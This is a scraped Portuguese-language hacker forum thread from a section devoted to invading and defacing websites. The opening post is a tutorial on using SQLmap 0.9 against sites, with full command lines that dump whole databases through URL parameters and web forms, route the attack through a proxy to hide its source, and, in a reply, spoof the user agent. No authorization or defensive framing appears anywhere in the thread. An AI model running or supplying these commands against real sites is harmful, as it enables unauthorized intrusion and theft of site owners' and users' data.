Академический Документы
Профессиональный Документы
Культура Документы
Registrar
Membros
Calendrio
Postados Hoje
Pesquisar
Lembrar? Logar
Frum do Guia do Hacker Segurana Digital e Hacking rea Hacker Defacer SQLmap 0.9 - como usar [Dica] Defacer rea destinada a invaso de sites.
Tpicos Similares
Tpico Tpico Iniciado Por Frum Respostas ltima Mensagem
Tutorial Como Usar o ProRat Dvida Como usar um proxy? Tumblr.com O que ? Como Usar? Dica Como usar seu iPod como disco removvel Tutorial como usar o IRC
19 7 0 2 5
28-07-2011 18:58 26-05-2011 19:26 24-04-2011 15:17 23-06-2010 12:33 15-10-2009 16:24
Compartilhar |
Ferramentas do Tpico
Modos de Exibio
#1
leohotluz
Membro
0 SQLmap 0.9 - como usar [Dica] Como fazer funcionar: Na vez que conheci esse programinha bsico, tive dificuldade pra execut-lo no Windows, ento vai essa dica. SQLmap 0.9 roda no windows e linux com python instalado (ateno usem python 2.6 seno no funciona) caso tenha python posterior, instale o 2.6 em outra pasta, e rode-o com o parmetro contendo o diretrio do sqlmap.py, ex: no terminal: c:\python26\python.exe "c:\sqlmap\sqlmap.py" (caso tenha algum python mais novo instalado). Caso s tenha o python 2.6 instalado, s joga o .py direto no terminal que funciona, ex: "c:\sqlmap\sqlmap.py" Use -h para ver demais comandos, ex: "c:\sqlmap\sqlmap.py" -h ou: c:\python26\python.exe "c:\sqlmap\sqlmap.py" (caso tenha vrios pythons instalados). Fazer Injection em varivel de link (GET):
"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --current-db --tables dump-all Isso ja extrai tudo que for possvel da database, mais prtico assim. Fazer Injeo em formulrio (POST): "c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --forms --current-db --tables dump-all o parmetro "--forms" vai fazer o SQLmap escnear a pgina html e procurar os formulrios contidos nela (podem ser formulrios de busca, enfim, todo tipo de input, combobox, checkbox, list, radio, text). o SQLmap vai te perguntar qual formulrio voc deseja usar (caso exista mais de um na mesma pgina). A galera esquece que d pra fazer injection em radio buttons, checkbox e etc. Para usar proxy: Usa-se o parmetro ' --proxy="http://xxx.xxx.xxx.xxx:xx" ' para ativar o seu uso, ex: "c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --proxy="http://200.156.35.2:3128" -current-db --tables dump-all Para aumentar poder de injeo:
forum.guiadohacker.com.br/showthread.php?t=17295
1/7
21/06/13
Resultados: Os resultados da varredura ficaro na pasta ./output/nome_do_site_injetado/ fonte: eu mesmo Para saber outros detalhes sobre o sql map, tem o post do prT's: [Somente usurios registrados podem ver os Links. Clique aqui para se REGISTRAR] [Somente usurios registrados podem ver os Links. Clique aqui para se REGISTRAR] ltima edio por John; 28-08-2011 s 11:19.. Motivo: Adicionado link
coiote (27-08-2011), fopen (02-01-2012), gaaramaster (31-01-2013), John (28-08-2011), LUCASVITORINO (16-04-2012), sabbath1989 (11-04-2013), v1s1t0r (06-04-2012), xibiows (28-08-2011)
#2
FalcoOMxD
Estudante de Engenharia Social
Opa muito bom.. vo analizar aki.. vlw Obrigado por compartilhar ! FalcoOmxD __________________
Status: Estudante de Engenharia Social Registrado em: Apr 2011 Localizao: Pico-do-Imalaia
"stay hungry stay foolish" - Um perfeito crculo virtuoso, talvez utpico, mas alcanvel. Steve Jobs
forum.guiadohacker.com.br/showthread.php?t=17295
2/7
21/06/13
Posts: 204
28-08-2011, 09:49
#3
xibiows
Membro
parabens man, vo testa ake, ja q pra mim usa sqlmap emulava backtrack IAOeiea Thankzzz kara
Status: Membro Registrado em: Aug 2011 Localizao: Bat Caverna Posts: 3
28-08-2011, 11:21
#4
John
Membro Participativo
forum.guiadohacker.com.br/showthread.php?t=17295
3/7
21/06/13
Status: Membro Participativo Registrado em: Oct 2009 Localizao: N/A Posts: 497
02-01-2012, 19:48
#5
live.mkt
Membro
02-01-2012, 21:37
#6
fopen
Membro
Muito bom podeia ter colocado tambem como mudar o user agent, desta forma por exemplo: ./sqlmap -u "http://www.sitevul.com/noticia.php?id=202" --user-agent="Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0"
forum.guiadohacker.com.br/showthread.php?t=17295
4/7
21/06/13
Status: Membro Registrado em: Nov 2011 Localizao: U.S.A Posts: 207
03-07-2012, 13:26
#7
Movi3r
Membro
O meu est dando um erro. 1- Quando eu executo aparece uma mensagem tipo essa: " Enter to continue " , e quando eu clico enter ele encerra.
forum.guiadohacker.com.br/showthread.php?t=17295
5/7
21/06/13
03-07-2012, 13:53
#8
Movi3r
Membro
Tags
no no no no
postar novos tpicos postar respostas postar anexos editar seus posts
Ir para... Defacer Ir
Regras do Frum
forum.guiadohacker.com.br/showthread.php?t=17295
6/7
21/06/13
Registrar
Membros
Calendrio
Pesquisar
Postados Hoje
forum.guiadohacker.com.br/showthread.php?t=17295
7/7